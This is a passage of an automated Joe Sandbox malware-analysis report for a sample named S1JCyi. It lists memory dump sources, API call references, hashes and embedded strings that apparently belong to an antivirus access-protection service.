                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                      • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                      • API String ID: 93015348-1041928032
                                      • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                      • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                      • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                      • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                      • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                      • API String ID: 3682727354-300733478
                                      • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                      • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                      • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                      • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                      • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                      • API String ID: 2587151837-1427723692
                                      • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                      • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                      • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                      • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                      • String ID: SetDllDirectoryW$kernel32.dll
                                      • API String ID: 3184163350-3826188083
                                      • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                      • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                      • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                      • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcesslstrlen
                                      • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                      • API String ID: 3424473247-996641649
                                      • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                      • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                      • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                      • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: String$ByteCharMultiWide$ErrorLast
                                      • String ID:
                                      • API String ID: 1775797328-0
                                      • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                      • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                      • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                      • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                      • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                      • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                      • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                      • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                      • String ID:
                                      • API String ID: 1232609184-0
                                      • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                      • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                      • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                      • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                      • String ID: H
                                      • API String ID: 2107338056-2852464175
                                      • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                      • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                      • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                      • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                      • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                      • API String ID: 1322048431-2685357988
                                      • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                      • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                      • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                      • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterLeaveTimerWaitable
                                      • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                      • API String ID: 2984211723-3002863673
                                      • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                      • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                      • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                      • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                      • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                      • API String ID: 678758403-4129911376
                                      • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                      • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                      • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                      • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcesslstrlen
                                      • String ID:
                                      • API String ID: 3424473247-0
                                      • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                      • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                      • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                      • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                      • String ID: bad exception$csm$csm$csm
                                      • API String ID: 3766904988-820278400
                                      • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                      • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                      • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                      • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                      • String ID:
                                      • API String ID: 2707001247-0
                                      • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                      • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                      • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                      • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                      • String ID: csm$csm$csm
                                      • API String ID: 849930591-393685449
                                      • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                      • Instruction ID: 72b7afd2e5a996e69dc8a08cf90cf42e26077c9ebf850453a80c7f0f93b598bb
                                      • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                      • Instruction Fuzzy Hash: 62D15232B08B4186EB209BA6E4403BD77A4FB55BA8F1141BADE4D57766DF38E4E1C700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                      • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                      • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                      • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                      • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                      • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                      • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732910630.00007FFE1A481000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A480000, based on PE: true
                                      • Associated: 00000005.00000002.2732897441.00007FFE1A480000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732927296.00007FFE1A492000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732942227.00007FFE1A49D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2732957501.00007FFE1A49F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a480000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: AddressFreeLibraryProc
                                      • String ID: api-ms-$ext-ms-
                                      • API String ID: 3013587201-537541572
                                      • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                      • Instruction ID: aa4d80f4429132e26b255220c23082659f79fbd7ee70103783e1313daefd6f00
                                      • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                      • Instruction Fuzzy Hash: 9541F221B19E0245EA268B57B8106BA2391BF49FB0F1945F7DD1E477A4EF3CE4A6C340
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                      • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                      • API String ID: 1119674940-1966266597
                                      • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                      • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                      • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                      • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732850549.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732866743.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2732881506.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_S1JCyi.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcesslstrlen$ComputerName
                                      • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                      • API String ID: 3702919091-996641649
                                      • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                      • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                      • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                      • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                      APIs
                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2732825762.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2732810974.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
